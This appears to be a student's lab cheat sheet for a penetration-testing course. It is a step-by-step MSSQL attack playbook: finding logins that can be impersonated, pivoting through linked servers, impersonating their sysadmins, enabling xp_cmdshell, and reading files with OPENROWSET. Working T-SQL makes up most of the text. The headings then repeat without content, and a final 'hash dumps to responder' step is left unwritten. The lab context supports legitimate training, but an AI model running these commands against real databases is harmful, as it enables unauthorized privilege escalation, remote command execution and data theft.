Common Service Hard Lab

If you get an initial login on MSSQL, here’s what you do:

Remember to type go after this stuff.

Determine if you can impersonate anyone

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

Impersonate

EXECUTE AS LOGIN = 'FOUND_USER' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')

Find Linked Databases

SELECT srvname, isremote FROM sysservers

Determine who has sysadmin rights on the linked database

EXEC ('SELECT sp.name AS SysAdminName FROM sys.server_principals sp JOIN sys.server_role_members srm ON sp.principal_id = srm.member_principal_id JOIN sys.server_principals rp ON srm.role_principal_id = rp.principal_id WHERE rp.name = ''sysadmin''') AT [LOCAL.TEST.LINKED.SRV];

Impersonate those sysadmins on the linked databases

EXEC ('EXECUTE AS LOGIN = ''SOME_ADMIN''; SELECT USER_NAME();') AT [LOCAL.TEST.LINKED.SRV];

XP_CMDSHELL

NOTE: LOCAL.TEST.LINKED.SRV is the name of a linked database found earlier

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure ‘show advanced options’, 1
 EXEC (‘RECONFIGURE’) AT [LOCAL.TEST.LINKED.SRV]
EXECUTE sp_configure 'xp_cmdshell', 1
go
Reconfigure
go

NOTE:

You can always EXEC (’SOMECOMMAND;SOMEOTHERCOMMAND;’) at [SOME_DATABASE]

Read Files

EXEC ('SELECT * FROM OPENROWSET(BULK ''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];

If you get an initial login on MSSQL, here’s what you do:

Determine if you can impersonate anyone

Impersonate

Find Linked Databases

Determine who has sysadmin rights on the linked database

Impersonate those sysadmins on the linked databases

XP_CMDSHELL

NOTE:

Read Files

Force hash dumps to responder